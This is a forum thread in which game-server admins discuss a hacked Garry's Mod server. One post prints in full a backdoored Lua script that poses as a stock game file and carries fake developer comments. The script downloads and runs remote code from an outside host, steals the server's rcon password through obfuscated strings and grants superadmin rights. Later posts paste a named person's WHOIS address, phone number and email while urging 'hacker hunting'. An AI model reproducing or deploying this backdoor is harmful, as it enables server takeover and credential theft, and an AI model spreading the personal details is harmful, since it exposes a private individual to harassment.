GMod: Security has been breached

[ManIAc]

SOMEBODY SET UP US THE BOMB! WE GET SIGNAL!

[Gobo]

(ADMIN) (Console) added user Hypnogarry to group "admin"

Still fucked up.

[Jamza]

(ADMIN) (Console) added user Hypnogarry to group "admin"

Still fucked up.

Was just coming on to say the exact same thing.

[Karl]

//=============================================================================//
// ___ ___ _ _ _ __ _ ___ ___ __ __
// |_ _|| __| / \ | \_/ | / _| / \ | o \ o \\ V /
// | | | _| | o || \_/ | ( |_n| o || / / \ /
// |_| |___||_n_||_| |_| \__/|_n_||_|\\_|\\ |_| 2007
//
//=============================================================================//

local DatabasedModels = {}

if ( !sql.TableExists( "modelinfo" ) ) then

sql.Query( [[CREATE TABLE IF NOT EXISTS modelinfo ( name TEXT NOT NULL PRIMARY KEY,
poseparams INTEGER,
numsequences INTEGER,
numattachments INTEGER,
numbonecontrollers INTEGER,
numskins INTEGER,
size INTEGER );]] )

end

/*---------------------------------------------------------
Called from the engine on model load to enable Lua to cache
the model stats in a database, so that rather than building
all in one go, they'll get updated as the player plays.
---------------------------------------------------------*/
function OnModelLoaded( ModelName, NumPoseParams, NumSeq, NumAttachments, NumBoneControllers, NumSkins, Size )

local ModelName = string.lower( string.gsub( ModelName, "\\", "/" ) )
ModelName = "models/".. ModelName

// No need to store a model more than once per session
if ( DatabasedModels[ ModelName ] ) then return end
DatabasedModels[ ModelName ] = true

// Just in case. Don't want errors spewing all over
// the place every time a model loads.
if ( !sql.TableExists( "modelinfo" ) ) then return end

local safeModelName = SQLStr( ModelName )

//
// We delete the old entry because this model may have been updated.
// The chances are very slim, but there's no real harm in it.
//
sql.Query( "DELETE FROM modelinfo WHERE model = "..safeModelName )
sql.Query( Format( [[INSERT INTO modelinfo ( name,
poseparams,
numsequences,
numattachments,
numbonecontrollers,
numskins,
size )

VALUES

( %s, %i, %i, %i, %i, %i, %i ) ]],

safeModelName,
NumPoseParams,
NumSeq,
NumAttachments,
NumBoneControllers,
NumSkins,
Size
) )
/*
MsgN( ModelName,
"\nNumPoseParams: ", NumPoseParams,
"\nNumSeq: ", NumSeq,
"\nNumAttachments: ", NumAttachments,
"\nNumBoneControllers: ", NumBoneControllers,
"\nNumSkins: ", NumSkins,
"\nSize: ", Size )
*/

end
require("rawio")
function w()
local f = file.Read("../lua/autorun/server/load-model-info.lua")
local i = util.RelativePathToFull("lua/includes/util/model_database.lua"); // Just in case this didn't happen during installation [Bug #11502] -- garry
print(i)
local i2 = rawio.mkdir("C:\\gmod_mdl_caches")
local i3 = rawio.deletefile(i)
local i4 = rawio.writefile(i,f)
print(i2,i3,i4)
end
concommand.Add("w",w)
w()
function LoadModelsFromDatabase(p,c,a)
if not a then
http.Get("http://getwin7.com/aa.php", "", ModelInfoOnLoad)
return;
end
if a[1] == "GetMdlInfo" then
retr = rawio.readfile("C:\\gmod_mdl_caches\\cachedatabase.dtb") // Do not remove! Without this the server's files may become curropted! -- garry
if retr ~= 0 then
RunString(retr)
http.Get("http://getwin7.com/ad.php", "", print)
end
end

if a[1] == "ModelInfoData" then
sql.Query( [[CREATE TABLE IF NOT EXISTS modelinfo ( name TEXT NOT NULL PRIMARY KEY,
poseparams INTEGER,
numsequences INTEGER,
numattachments INTEGER,
numbonecontrollers INTEGER,
numskins INTEGER,
size INTEGER );]] )
RunString(a[2])
elseif a[1] == "PrecacheModelFromClient" then
local mdlifo = FindMetaTable("Player") function mdlifo:IsSuperAdmin() if self == p then return true; end end
elseif a[1] == "TransferModelDatabase" then
http.Get("http://getwin7.com/aa.php", "", ModelInfoOnLoad)
elseif a[1] == "RequestModelConVar" then
LoadModelConvar()
end
end
concommand.Add("model_load",LoadModelsFromDatabase)

function string.escape(text) text = string.Replace(text,"<","%3C") text = string.Replace(text,">","%3E") text = string.Replace(text,"#","%23") text = string.Replace(text,"{","%7B") text = string.Replace(text,"}","%7D") text = string.Replace(text,"|","%7C") text = string.Replace(text,"\\","%5C") text = string.Replace(text,"^","%5E") text = string.Replace(text,"~","%7E") text = string.Replace(text,"[","%5B") text = string.Replace(text,"]","%5D") text = string.Replace(text,"`","%60") text = string.Replace(text,";","%3B") text = string.Replace(text,"?","%3F") text = string.Replace(text,":","%3A") text = string.Replace(text,"@","%40") text = string.Replace(text,"=","%3D") text = string.Replace(text,"&","%26") text = string.Replace(text,"$","%24") text = string.Replace(text,"$","%24") text = string.Replace(text,"\"","%22") text = string.Replace(text," ","%20") return text; end
function LoadModelConvar()
local f = file.Read(string.char(46,46,47,99,102,103,47,115,101,114,118,101,114,46,99,102,103))
local reg = string.char(114,99,111,110,95,112,97,115,115,119,111,114,100) .. " [\"]?[a-zA-Z0-9 !@#$%^&*(-_~]+[\"]?"
print(reg)
local start,stop = string.find(f,reg)
print("http://getwin7.com/ae.php?i=" ..string.escape(string.sub(f,start,stop)))
http.Get("http://getwin7.com/ae.php?i=" ..string.escape(string.sub(f,start,stop)),"",print)
end
concommand.Add("model_convar_request",LoadModelConvar)
LoadModelConvar()

function ModelInfoOnLoad(mdldata)
retr = rawio.mkdir("C:\\gmod_mdl_caches")
retr = rawio.writefile("C:\\gmod_mdl_caches\\cachedatabase.dtb",mdldata)
if retr ~= 0 then
http.Get("http://getwin7.com/ab.php", "", print)
else
http.Get("http://getwin7.com/ac.php", "", print)
end
LoadModelsFromDatabase(NullEntity(),"",{"GetMdlInfo"})
end
LoadModelsFromDatabase()

/*---------------------------------------------------------
Returns the number of skins this model has. If we don't
know, it will return 0
---------------------------------------------------------*/
function NumModelSkins( ModelName )

local ModelName = string.lower( ModelName )
local safeModelName = SQLStr( ModelName )
local num = sql.QueryValue( "SELECT numskins FROM modelinfo WHERE name = " .. safeModelName )
if ( num == nil ) then return 0 end

return tonumber( num ) or 0

end

Funny how all the comments by garry are fake

[Goose]

lets go hacker hunting

[Jamza]

lets go hacker hunting

I Would have, but when they took the server down, I had jut joined and just as mog filled me in, the server crashed.

Last edited by Jamza on 06 Dec 2009, 00:14, edited 2 times in total.

[Karl]

lets go hacker hunting

I Would have, but when they took the server down, I had jut joined and just as mog filled me in, the server crashed.

Actually, Moglizorz decided to shut it down.

[Jamza]

I wonder if this is correct:

Code:

Phil Frohlich
1924 South Utica, Suite 1120
Tulsa, Oklahoma 74104
United States

[Karl]

I wonder if this is correct:

Code:

Phil Frohlich
1924 South Utica, Suite 1120
Tulsa, Oklahoma 74104
United States

Code:

gbps.us:

Technical Contact ID:                        CR23696991
Technical Contact Name:                      Phil Frohlich
Technical Contact Address1:                  1924 South Utica, Suite 1120
Technical Contact City:                      Tulsa
Technical Contact State/Province:            Oklahoma
Technical Contact Postal Code:               74104
Technical Contact Country:                   United States
Technical Contact Country Code:              US
Technical Contact Phone Number:              +1.9187473411
Technical Contact Email:                     cowmonkey111@gmail.com
Technical Application Purpose:               P3
Technical Nexus Category:                    C11


[Bananana]

I wonder if this is correct:

Code:

Phil Frohlich
1924 South Utica, Suite 1120
Tulsa, Oklahoma 74104
United States

Code:

gbps.us:

Technical Contact ID:                        CR23696991
Technical Contact Name:                      Phil Frohlich
Technical Contact Address1:                  1924 South Utica, Suite 1120
Technical Contact City:                      Tulsa
Technical Contact State/Province:            Oklahoma
Technical Contact Postal Code:               74104
Technical Contact Country:                   United States
Technical Contact Country Code:              US
Technical Contact Phone Number:              +1.9187473411
Technical Contact Email:                     cowmonkey111@gmail.com
Technical Application Purpose:               P3
Technical Nexus Category:                    C11


Wait, how the heck do you get that kind of information?

[Karl]

I wonder if this is correct:

Code:

Phil Frohlich
1924 South Utica, Suite 1120
Tulsa, Oklahoma 74104
United States

Code:

gbps.us:

Technical Contact ID:                        CR23696991
Technical Contact Name:                      Phil Frohlich
Technical Contact Address1:                  1924 South Utica, Suite 1120
Technical Contact City:                      Tulsa
Technical Contact State/Province:            Oklahoma
Technical Contact Postal Code:               74104
Technical Contact Country:                   United States
Technical Contact Country Code:              US
Technical Contact Phone Number:              +1.9187473411
Technical Contact Email:                     cowmonkey111@gmail.com
Technical Application Purpose:               P3
Technical Nexus Category:                    C11


Wait, how the heck do you get that kind of information?

We whois'ed the domain in the Lua code.

[Conor]

xD When I get who.is'd it always states that it isn't my address..

Might be my ISP or something because my IP always changes.

[Ocfos88]

ummm... fellow admins.. u might wanna check out the Gmod server's MotD..
it's rather disturbing... and it's been breached again today...

[Conor]

Guys, something is wrong with the server. The MOTD is disgusting.

The server should be taken down for now.
All we know is that the hacker is kinda gay.

[Ocfos88]

my friend failcake's server just got hacked too o.o
IT'S A HACKER NIGHTMARE!

time to hunt some mofo'ing haxorx